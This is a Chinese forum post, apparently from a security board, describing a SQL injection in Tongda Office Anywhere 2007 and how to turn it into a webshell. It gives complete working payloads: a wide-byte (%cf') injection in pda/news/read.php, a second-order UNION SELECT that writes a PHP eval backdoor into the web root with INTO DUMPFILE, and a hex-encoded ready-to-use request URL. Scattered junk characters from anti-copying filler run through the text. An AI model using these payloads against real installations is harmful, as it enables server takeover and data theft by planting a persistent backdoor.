找回密码
 立即注册
查看: 3058|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本. h6 y9 b1 Z* Y& G! Y% a0 x  c3 m( E2 ^
& I  p$ \3 q! l0 L' v; z
) B4 F8 i- V' V4 M% _- v$ m
Office Anywhere 2007 网络智能办公系统: S7 \- P" ?8 x: z& n; m7 o
5 V# B" L/ o% |) A$ o8 t2 w; \
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
" b! J  o  z' B
- p7 h3 d/ |/ I" ~" ]& P5 n
7 X/ N0 {' O- q0 f& t这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的+ O9 G2 S( F, Y0 [

  {! \" i* R% f, R例如:SELECT * from USER where USER_ID='{$USERNAME}'  
7 O# k( Q" t' {( a. H其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
8 b4 K) y0 V/ }9 ^9 M; X/ t
% ]0 ?- j8 ~8 O+ t) L这个时候我们是不是可以组合起来使用哪?
( Q" E! {, I9 s. M& k% @) t  A4 n 4 y# X( |5 O: e" n6 K$ ?
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
9 C& _! r4 B0 I5 }union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,102 w3 o# R! |7 M. ~& _0 c

$ V) V6 H  o& `+ S这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
; D7 E$ P  i3 {" Q" ~' D1 W- i
9 w( Q! t: d3 O# d. @) P8 e那么问题来了,单引号可以吗?当然是不可以的,^_^。。。0 f( N( ^! w4 n3 E% g8 z1 z: u
) [& w5 i: g3 w3 h. F- l8 \. F
那么我们用字符串格式带入进行hex编码
( H" t! B0 }- x+ I 9 E# H/ W* ^* q8 p1 \, X1 A
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23. h; u  H- c' m. d4 _1 ^# r% V$ ]

. A; ~5 C. m# D1 Y- |1 B1 Q7 l, A测试ok,获取oa的webshell3 e9 `  p$ l; a* Q
2 c' a5 z; c8 f" E
! h" g0 Z+ g& u
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
5 q, H! c, |4 Z2 {, f3 J直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表